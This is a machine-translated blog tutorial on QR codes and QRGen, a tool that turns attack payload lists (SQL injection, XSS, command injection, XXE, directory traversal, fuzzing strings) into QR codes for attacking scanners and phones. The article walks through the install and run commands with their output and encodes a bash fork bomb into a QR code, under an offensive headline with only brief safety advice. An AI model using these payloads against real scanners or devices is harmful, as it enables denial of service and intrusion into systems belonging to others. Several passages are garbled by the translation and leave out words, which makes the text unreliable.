Generate malicious QR codes to hack phones and scanners

QR codes are everywhere, from product packaging to airline boarding passes, making scanners that read them a delicious target for hackers.

infoguard cyber security qr code security

Thanks to flaws in many of these scanning devices, it is possible to exploit common vulnerabilities using formatted into custom QR codes. A tool called QRGen can generate malicious QR codes and even encode custom payloads.

These attacks are quite effective because people cannot read or understand the information contained in a QR code without scanning it, potentially exposing any device that for attempting to decrypt the code in the exploit contained within.

Even QR code scanners like the , may be vulnerable to this type of attack, as QR codes have been found to be able to lure iPhone users to malicious websites.

What are QR codes?

QR codes are readable data formats that are useful for anything that needs to be scanned automatically. Before QR codes, there were many other formats called barcodes, which also stored data in a way that was easy for machines to read.

You've probably seen a UPC barcode like the one on products, as it is often used to identify items for sale so cashiers can scan them to allow for faster payment.

create malicious qr codes hack phones other

The UPC Barcode, or Global Product Code, has been in use since 1974. It targets mainly retailers and encodes only a series of numbers, making it limited. While there are many different types of barcodes, they are not able to store much information.

2D Barcodes for more data

The answer to barcode limitation was 2D codes, which offer greater storage of information contained within them. Some of the first two-dimensional codes resembled the following, which is still widely used today.

aztec code

Aztec code is a 2D, similar to a QR code and can contain more information than a barcode. Originally developed for logistics, you can see it being used in packages and folders when more data needs to be stored than a barcode can provide.

Other types of 2D codes may contain extremely large amounts of data. The PDF417 format on the back of most licenses in the United States, for example, can encode up to 1800 ASCII characters.

speed

PDF417 codes as above can encode text, numbers, and actual bytes of data and are more error-tolerant than barcodes. Companies like FedEx use a combination of PDF417 and other barcodes on their packing slips to automate their delivery and tracking.

What can passwords with more data do?

QR codes started in the automotive industry as a way to track cars as they were manufactured, but quickly grew in popularity outside of this industry. Similar to other two-dimensional codes, QR codes can pack large amounts of data and can even work when reduced in resolution or damaged.

frame2

A single QR code can contain 4.296 ASCII characters, which allows you to be much more creative about what you can do with them. You can even format the data to take action when it is recognized by a reader.

An exciting application of QR codes enabled by their larger data capacity is their use to manage Wi-Fi connections without sharing a plain text password.

By encoding the following string, you can generate a QR code that automatically registers Android users on a Wi-Fi network.

Anyone who scans the QR code on an Android device will automatically be connected to the encrypted Wi-Fi network. To find out how much data a QR code can pack, take a look at this code:

2

This tiny code contains the following text:

Version 40 QR Code can contain up to 1852 chars.
A QR code (abbreviated from Quick Response code) is a type of barcode (or two-dimensional code) that is designed to be read by smartphones.
The code consists of black modules arranged in a square pattern on a white background. The information encoded may be text, a URL, or other data.
Created by Toyota subsidiary Denso Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes.
The QR code was designed to allow its contents to be decoded at high speed.
The technology has seen frequent use in Japan and South Korea; the United Kingdom is the seventh-largest national consumer of QR codes.
Although initially used for tracking parts in vehicle manufacturing, QR codes now are used in a much broader context,
including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (termed mobile tagging).
QR codes may be used to display text to the user, to add a vCard contact to the user's device, to open a Uniform Resource Identifier (URI), or to an e-mail or text message.
Users can generate and print their own QR codes for others to scan and use by visiting one of several paid and free QR code generating sites or apps.

The text in the image is larger than the QR code itself! Capacity makes QR codes both powerful and dangerous, because people cannot understand the data in them without first scanning them.

QRgen for QR Code Hacking

Because a person cannot detect a malicious QR code before scanning it, the relatively large payload of a QR code can work to the benefit of a hacker, especially when paired with vulnerable devices. The tool we will use today to create them is called QRGen. It will take a payload and encode it into a QR code using Python.

QRGen comes with a built-in book which contains many popular exploits, which is extremely useful if you have time to sit down with the same device you want to exploit and learn which ones work for it.

For a pentester who wants to test anything using a QR code scanner, simply purchasing the scanner itself and running the exploits can lead the scanner to behave in unexpected ways.

The payload categories available on QRGen are accessible using the flag -l and a number when executing the script. The number and type of payload are listed below.

In 0: SQL Injections
In 1: XSS
In 2: command injection
In 3: FormString
In 4: XXE
In 5: String Fuzzing
In 6: SSI Injection
In 7: LFI / traverse

To create a bunch of malicious QR codes that include payloads with a fuzzy string, I just need to run QRGen.py -l 5 and I will have many codes to test.

What you will need

To use QRGen, you will need to install Python3. Because it is cross-, it should be possible to do it on any OS . You'll also need a few Python libraries, including qrcode, Pillow, and argparse, which we'll install during installation.

Step 1: Install QRGen

To get started with QRGen, you will need to download the repository from GitHub . We will do this by executing the following command in a terminal window.

~$ git clone https://github.com/h0nus/QRGen

Cloning into 'QRGen'...
remote: Enumerating objects: 86, done.
remote: Counting objects: 100% (86/86), done.
remote: Compressing objects: 100% (78/78), done.
remote: Total 86 (delta 26), reused 4 (delta 1), pack-reused 0
Unpacking objects: 100% (86/86), done.

Once the repository download is complete, change ( cd ) his list and write ls to view its contents and find it of the requirements.

~$ cd QRGen
~/QRGen$ ls

demo.gif  qrgen.py  README.md  requirements.txt  words

Now, we need to make sure we have all the required libraries installed. To do this, we will run the installation file with the following command.

~/QRGen$ pip3 install -r requirements.txt

Collecting qrcode (from -r requirements.txt (line 1))
  Downloading https://files.pythonhosted.org/packages/42/87/4a3a77e59ab7493d64da1f69bf1c2e899a4cf81e51b2baa855e8cc8115be/qrcode-6.1-py2.py3-none-any.whl
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (5.4.1)
Collecting argparse (from -r requirements.txt (line 3))
  Downloading https://files.pythonhosted.org/packages/f2/94/3af39d34be01a24a6e65433d19e107099374224905f1e0cc6bbe1fd22a2f/argparse-1.4.0-py2.py3-none-any.whl
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from qrcode->-r requirements.txt (line 1)) (1.12.0)
Installing collected packages: qrcode, argparse
Successfully installed argparse-1.4.0 qrcode-6.1

If this does not work, you can also install it with this alternative command.

~/QRGen$ python3 -m pip install -r requirements.txt

Step 2: Generate malicious QR codes from a payload type

Now, you should be able to run the script by typing python3 qrgen.py .

~/QRGen$ python3 qrgen.py

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

usage: qrgen.py -l [number]
usage: qrgen.py -w [/path/to/custom/wordlist]

Payload lists:
0 : SQL Injections
1 : XSS
2 : Command Injection
3 : Format String
4 : XXE
5 : String Fuzzing
6 : SSI Injection
7 : LFI / Directory Traversal

Tool to generate Malformed QRCodes for fuzzing QRCode parsers/reader

optional arguments:
  -h, --help            show this help message and exit

Options for QRGen:
  --list {0,1,2,3,4,5,6,7}, -l {0,1,2,3,4,5,6,7}
                        Set wordlist to use
  --wordlist WORDLIST, -w WORDLIST
                        Use a custom wordlist

Pay attention everywhere, even in the dumbest spot

As you can see, creating payloads is very simple. To get started, let's create a payload that contains string payloads. To do this, run QRGen with the following argument.

python3 qrgen.py -l 5

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

Payload path generated..
Path already cleared or deleted..
Generated 46 payloads!
Opening last generated payload...
Thanks for using QRGen, made by H0nus..

A series of QR codes will be generated and the last one created will open automatically.

3

To see the rest of the payloads, you can enter cd genqr to go to the directory where they are created and ls to see their content.

~/QRGen$ cd genqr
~/QRGen/genqr$ ls

payload-0.png   payload-19.png  payload-28.png  payload-37.png  payload-4.png
payload-10.png  payload-1.png   payload-29.png  payload-38.png  payload-5.png
payload-11.png  payload-20.png  payload-2.png   payload-39.png  payload-6.png
payload-12.png  payload-21.png  payload-30.png  payload-3.png   payload-7.png
payload-13.png  payload-22.png  payload-31.png  payload-40.png  payload-8.png
payload-14.png  payload-23.png  payload-32.png  payload-41.png  payload-9.png
payload-15.png  payload-24.png  payload-33.png  payload-42.png
payload-16.png  payload-25.png  payload-34.png  payload-43.png
payload-17.png  payload-26.png  payload-35.png  payload-44.png
payload-18.png  payload-27.png  payload-36.png  payload-45.png

Step 3: Encode custom payloads

To encode a custom payload, we can first create a text file containing what we want to encode. Each will be a new payloads. First, we can create a text file by typing nano badstuff.txt to create a text file.

~/QRGen/genqr$ nano badstuff.txt

In this text file, we can put our payload. The following is a fork bomb. It will work in a QR code scanner.

:(){ :|: & };:

We can save it by pressing x-control and then press Y and Enter to confirm your save. Now, you should see a text file containing your payload.

~/QRGen/genqr$ ls

badstuff.txt    payload-18.png  payload-27.png  payload-36.png  payload-45.png
payload-0.png   payload-19.png  payload-28.png  payload-37.png  payload-4.png
payload-10.png  payload-1.png   payload-29.png  payload-38.png  payload-5.png
payload-11.png  payload-20.png  payload-2.png   payload-39.png  payload-6.png
payload-12.png  payload-21.png  payload-30.png  payload-3.png   payload-7.png
payload-13.png  payload-22.png  payload-31.png  payload-40.png  payload-8.png
payload-14.png  payload-23.png  payload-32.png  payload-41.png  payload-9.png
payload-15.png  payload-24.png  payload-33.png  payload-42.png
payload-16.png  payload-25.png  payload-34.png  payload-43.png
payload-17.png  payload-26.png  payload-35.png  payload-44.png

To write the payload in a QR code, we will use the flag -w . Assuming your payload file is called "badstuff.txt", the command to do this should look like this (remember to go back to the QRGen directory).

~/QRGen/genqr$ cd ..
~/QRGen$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt'

  e88 88e   888 88e    e88'Y88
 d888 888b  888 888D  d888  'Y   ,e e,  888 8e
C8888 8888D 888 88"  C8888 eeee d88 88b 888 88b
 Y888 888P  888 b,    Y888 888P 888   , 888 888
  "88 88"   888 88b,   "88 88"   "YeeP" 888 888
      b
      8b,    QRGen ~ v0.1 ~ by h0nus

Payload path exist, continuing...
Path already cleared or deleted..
Generated 1 payloads!
Opening last generated payload...
Thanks for using QRGen, made by H0nus..

For the fork bomb payload, it generates the following QR code, which will be displayed.
4

It is not safe to scan all QR codes

QR codes can encode a lot of information and as we learned today, they can even be formatted to force a device to perform actions such as connecting to a Wi-Fi network.

This makes it dangerous to scan a QR code, as a person has no way of reading the information before exposing their device to any payload contained.

If you scan a QR code that looks suspicious, pay attention to what the code is trying to do, and do not connect to a Wi-Fi network, as you should not go to any shortcuts on it.

Although most QR codes should be secure for scanning on a smartphone, scanning the payloads we created today on a ticket or boarding scanner can lead to some weird behavior on the part of the device.

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.
QR code, smartphone, payload, hack, QRGen

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).